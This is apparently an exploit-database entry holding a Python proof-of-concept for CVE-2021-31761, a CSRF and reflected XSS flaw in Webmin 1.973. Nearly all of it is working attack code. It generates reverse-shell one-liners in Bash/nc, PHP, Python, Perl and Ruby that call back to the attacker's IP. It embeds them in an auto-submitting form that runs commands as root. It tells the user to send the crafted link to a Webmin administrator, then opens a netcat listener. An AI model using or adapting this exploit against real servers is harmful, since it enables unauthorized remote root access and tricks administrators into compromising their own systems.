Authored by Mesh3l_911, Z0ldyck

Webmin version 1.973 cross site request forgery exploit that loads a reverse shell.

advisories | CVE-2021-31761

# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)
# Date: 24/04/2021
# Exploit Author: Mesh3l_911 & Z0ldyck
# Vendor Homepage: https://www.webmin.com
# Repo Link: https://github.com/Mesh3l911/CVE-2021-31761
# Version: Webmin 1.973
# Tested on: All versions <= 1.973
# CVE: CVE-2021-31761
# Description: Exploiting a Reflected Cross-Site Scripting (XSS) attack to
# get a Remote Command Execution (RCE) through the Webmin's running process
# feature

import time, subprocess,random,urllib.parse


print('''33[1;37m

__ __ _ ____ _ _________ _ _ _
| / | | | |___ | | |___ / _ | | | | | |
| / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
| |/| |/ _ / __| '_ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
| | | | __/__ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
|_| |_|___||___/_| |_|____/|_| (_|_) /________/|_|__,_|__, |___|_|_/
__/ |
|___/

33[1;m''')

for i in range(101):
print(
"r33[1;36m [>] POC By 33[1;m 33[1;37mMesh3l33[1;m 33[1;36m ( 33[1;m33[1;37m@Mesh3l_91133[1;m33[1;36m ) & 33[1;m 33[1;37mZ0ldyck33[1;m33[1;36m ( 33[1;m33[1;37m@electronicbots33[1;m33[1;36m ) 33[1;m {} 33[1;m".format(
i), "33[1;36m%33[1;m", end="")
time.sleep(0.02)
print("nn")

target = input(
"33[1;36m n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > 33[1;m")

if target.endswith('/'):
target = target + 'tunnel/link.cgi/'
else:
target = target + '/tunnel/link.cgi/'

ip = input("33[1;36m n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > 33[1;m")

port = input("33[1;36m n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > 33[1;m")

ReverseShell = input
('''33[1;37m
n
1- Bash Reverse Shell n
2- PHP Reverse Shell n
3- Python Reverse Shell n
4- Perl Reverse Shell n
5- Ruby Reverse Shell n
33[1;m

33[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > 33[1;m''')

file_name = random.randrange(1000)

if ReverseShell == '1':
ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''

elif ReverseShell == '2':
ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' '''

elif ReverseShell == '3':
ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' '''

elif ReverseShell == '4':
ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '''

elif ReverseShell == '5':
ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' '''

else:
print("33[1;36m n Please Re-Check ur input :( 33[1;m n")


def CSRF_Generator():
Payload = urllib.parse.quote('''

<html>
<head>
<meta name="referrer" content="never">
</head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="/proc/run.cgi" method="POST">
<input type="hidden" name="cmd" value="''' + ReverseShell + '''" />
<input type="hidden" name="mode" value="0" />
<input type="hidden" name="user" value="root" />
<input type="hidden" name="input" value="" />
<input type="hidden" name="undefined" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>

</html>

''')

print("33[1;36mnHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ n n33[1;m")

print(target+Payload)

def Netcat_listener():
print()
subprocess.run(["nc", "-nlvp "+port+""])


def main():
CSRF_Generator()
Netcat_listener()


if __name__ == '__main__':
main()